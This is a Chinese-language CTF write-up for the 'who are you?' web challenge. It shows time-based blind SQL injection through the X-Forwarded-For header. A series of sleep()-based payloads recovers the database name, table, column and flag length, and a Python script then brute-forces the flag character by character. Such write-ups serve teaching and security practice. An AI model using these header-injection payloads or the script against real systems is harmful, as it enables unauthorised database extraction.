who are you?----Writeup

原题查看：http://ctf5.shiyanbar.com/web/wonderkun/index.php

记录了ip

顺势想到可能是X-Forwarded-For的问题

又因为题目提示记录到db中去

就可以想到应该是注入

X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (length(database())=4) then sleep(2) else sleep(0) end))lzRG) and '1'='1

可以看到裤名是4位

X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (database() like 'web1') then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到数据库名web1

X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(*) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到数据库的表名

X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到数据库的列名

X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>1) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里没有延时，可以判断只有一条数据

X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select length(flag) from flag )=32) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到flag的长度

X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like "%")>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里就开始写个脚本爆破

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import time

payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'    #mysql like不区分大小写

flag = ""
print 'Start to retrive flag:'
for i in range(32):
    for payload in payloads:
        starttime=time.time()
        url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

        headers = { "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",
            "Connection": "keep-alive",
            "X-FORWARDED-FOR": "127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like '"+flag+payload+"%')>0) then sleep(5) else sleep(0) end))lzRG) and '1'='1"
            }

        res = requests.get(url, headers=headers)
        if time.time() - starttime > 5:
            starttime2=time.time()
            res = requests.get(url, headers=headers)
            if time.time() - starttime > 5:
                flag+=payload
                print '
 database is:',flag,
                break
        else:
            print '.',
print '
[Done] current database is %s' %flag

最后得到flag